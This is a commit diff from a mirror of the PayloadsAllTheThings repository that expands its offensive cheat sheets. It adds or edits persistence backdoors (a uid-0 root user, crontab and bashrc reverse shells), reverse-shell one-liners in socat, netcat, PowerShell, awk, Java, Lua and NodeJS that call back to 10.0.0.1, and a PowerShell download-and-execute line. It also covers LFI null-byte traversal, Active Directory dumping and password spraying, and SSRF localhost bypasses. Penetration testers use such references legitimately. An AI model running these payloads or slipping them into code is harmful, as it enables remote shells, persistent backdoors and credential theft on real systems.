mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Add root user + PHP null byte version
This commit is contained in:
parent
c3f96c6753
commit
9be62677b6
@ -33,6 +33,7 @@
|
||||
|
||||
* [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus)
|
||||
* [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite)
|
||||
* [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
|
||||
|
||||
## Basic LFI
|
||||
|
||||
@ -44,6 +45,8 @@ http://example.com/index.php?page=../../../etc/passwd
|
||||
|
||||
### Null byte
|
||||
|
||||
:warning: In versions of PHP below 5.3 we can terminate with null byte.
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=../../../etc/passwd%00
|
||||
```
|
||||
|
@ -212,3 +212,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
|
||||
* [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](https://hackerone.com/reports/435066)
|
||||
* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
|
||||
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
|
||||
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
|
||||
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
|
@ -318,6 +318,11 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
|
||||
|
||||
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
|
||||
```
|
||||
or dump the Active Directory and `grep` the content.
|
||||
|
||||
```powershell
|
||||
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
|
||||
```
|
||||
|
||||
### PassTheTicket Golden Tickets
|
||||
|
||||
@ -581,6 +586,8 @@ Alternatively you can use the Metasploit module
|
||||
|
||||
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
|
||||
|
||||
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
|
||||
|
||||
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
|
||||
|
||||
```powershell
|
||||
@ -646,3 +653,4 @@ Most of the time the best passwords to spray are :
|
||||
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
|
||||
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
|
||||
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
|
||||
* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
|
@ -1,5 +1,21 @@
|
||||
# Linux - Persistence
|
||||
|
||||
## Summary
|
||||
|
||||
* [Basic reverse shell](#basic-reverse-shell)
|
||||
* [Add a root user](#add-a-root-user)
|
||||
* [Suid Binary](#suid-binary)
|
||||
* [Crontab - Reverse shell](#crontab-reverse-shell)
|
||||
* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
|
||||
* [Backdooring a startup service](#backdoor-a-startup-service)
|
||||
* [Backdooring a user startup file](#backdooring-an-user-startup-file)
|
||||
* [Backdooring a driver](#backdooring-a-driver)
|
||||
* [Backdooring the APT](#backdooring-the-apt)
|
||||
* [Backdooring the SSH](#backdooring-the-ssh)
|
||||
* [Tips](#tips)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Basic reverse shell
|
||||
|
||||
```bash
|
||||
@ -8,6 +24,13 @@ ncat --sctp -lvp 4242
|
||||
ncat --tcp -lvp 4242
|
||||
```
|
||||
|
||||
## Add a root user
|
||||
|
||||
```powershell
|
||||
sudo useradd -ou 0 -g 0 john
|
||||
sudo passwd john
|
||||
```
|
||||
|
||||
## Suid Binary
|
||||
|
||||
```powershell
|
||||
@ -19,13 +42,15 @@ chown root:root $TMPDIR2/croissant
|
||||
chmod 4777 $TMPDIR2/croissant
|
||||
```
|
||||
|
||||
## Crontab (Reverse shell to 192.168.1.2 on port 4242)
|
||||
## Crontab - Reverse shell
|
||||
|
||||
```bash
|
||||
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
|
||||
```
|
||||
|
||||
## Backdooring an user's bash_rc (FR/EN Version)
|
||||
## Backdooring a user's bash_rc
|
||||
|
||||
(FR/EN Version)
|
||||
|
||||
```bash
|
||||
TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
|
||||
@ -48,7 +73,7 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
|
||||
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
|
||||
```
|
||||
|
||||
## Backdooring an user startup file
|
||||
## Backdooring a user startup file
|
||||
|
||||
Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop`
|
||||
|
||||
|
@ -5,6 +5,7 @@
|
||||
* [Reverse Shell](#reverse-shell)
|
||||
* [Bash TCP](#bash-tcp)
|
||||
* [Bash UDP](#bash-udp)
|
||||
* [Socat](#socat)
|
||||
* [Perl](#perl)
|
||||
* [Python](#python)
|
||||
* [PHP](#php)
|
||||
@ -50,6 +51,15 @@ Listener:
|
||||
nc -u -lvp 4242
|
||||
```
|
||||
|
||||
### Socat
|
||||
|
||||
```powershell
|
||||
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
|
||||
user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
|
||||
```
|
||||
|
||||
Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)
|
||||
|
||||
### Perl
|
||||
|
||||
```perl
|
||||
@ -118,12 +128,13 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","
|
||||
|
||||
```bash
|
||||
nc -e /bin/sh [IPADDR] [PORT]
|
||||
nc.traditional -e /bin/bash 10.0.0.1 4444
|
||||
```
|
||||
|
||||
### Netcat OpenBsd
|
||||
|
||||
```bash
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
|
||||
```
|
||||
|
||||
### Ncat
|
||||
@ -147,11 +158,11 @@ user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet
|
||||
### Powershell
|
||||
|
||||
```powershell
|
||||
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
```
|
||||
|
||||
```powershell
|
||||
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
|
||||
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
|
||||
```
|
||||
|
||||
```powershell
|
||||
@ -161,21 +172,21 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse
|
||||
### Awk
|
||||
|
||||
```powershell
|
||||
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
|
||||
awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
|
||||
```
|
||||
|
||||
### Java
|
||||
|
||||
```java
|
||||
r = Runtime.getRuntime()
|
||||
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
|
||||
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
|
||||
p.waitFor()
|
||||
```
|
||||
|
||||
### War
|
||||
|
||||
```java
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
|
||||
strings reverse.war | grep jsp # in order to get the name of the file
|
||||
```
|
||||
|
||||
@ -185,13 +196,13 @@ strings reverse.war | grep jsp # in order to get the name of the file
|
||||
Linux only
|
||||
|
||||
```powershell
|
||||
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
|
||||
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');"
|
||||
```
|
||||
|
||||
Windows and Linux
|
||||
|
||||
```powershell
|
||||
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||
lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||
```
|
||||
|
||||
### NodeJS
|
||||
@ -202,7 +213,7 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
|
||||
cp = require("child_process"),
|
||||
sh = cp.spawn("/bin/sh", []);
|
||||
var client = new net.Socket();
|
||||
client.connect(8080, "10.17.26.64", function(){
|
||||
client.connect(4242, "10.0.0.1", function(){
|
||||
client.pipe(sh.stdin);
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
@ -213,12 +224,12 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
|
||||
|
||||
or
|
||||
|
||||
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
|
||||
require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242')
|
||||
|
||||
or
|
||||
|
||||
-var x = global.process.mainModule.require
|
||||
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
|
||||
-x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash')
|
||||
|
||||
or
|
||||
|
||||
|
@ -23,6 +23,10 @@
|
||||
|
||||
## Tools
|
||||
|
||||
- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
|
||||
```powershell
|
||||
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
|
||||
```
|
||||
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
|
||||
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
|
||||
```powershell
|
||||
@ -43,10 +47,6 @@
|
||||
```powershell
|
||||
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
|
||||
```
|
||||
- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
|
||||
```powershell
|
||||
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
|
||||
```
|
||||
|
||||
## Windows Version and Configuration
|
||||
|
||||
|
@ -114,6 +114,7 @@ http://0000::1:3128/ Squid
|
||||
### Bypass localhost with a domain redirection
|
||||
|
||||
```powershell
|
||||
http://spoofed.burpcollaborator.net
|
||||
http://localtest.me
|
||||
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
|
||||
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
|
||||
@ -629,3 +630,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
|
||||
- [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)
|
||||
- [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
|
||||
- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)
|
||||
- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)
|
Loading…
Reference in New Issue
Block a user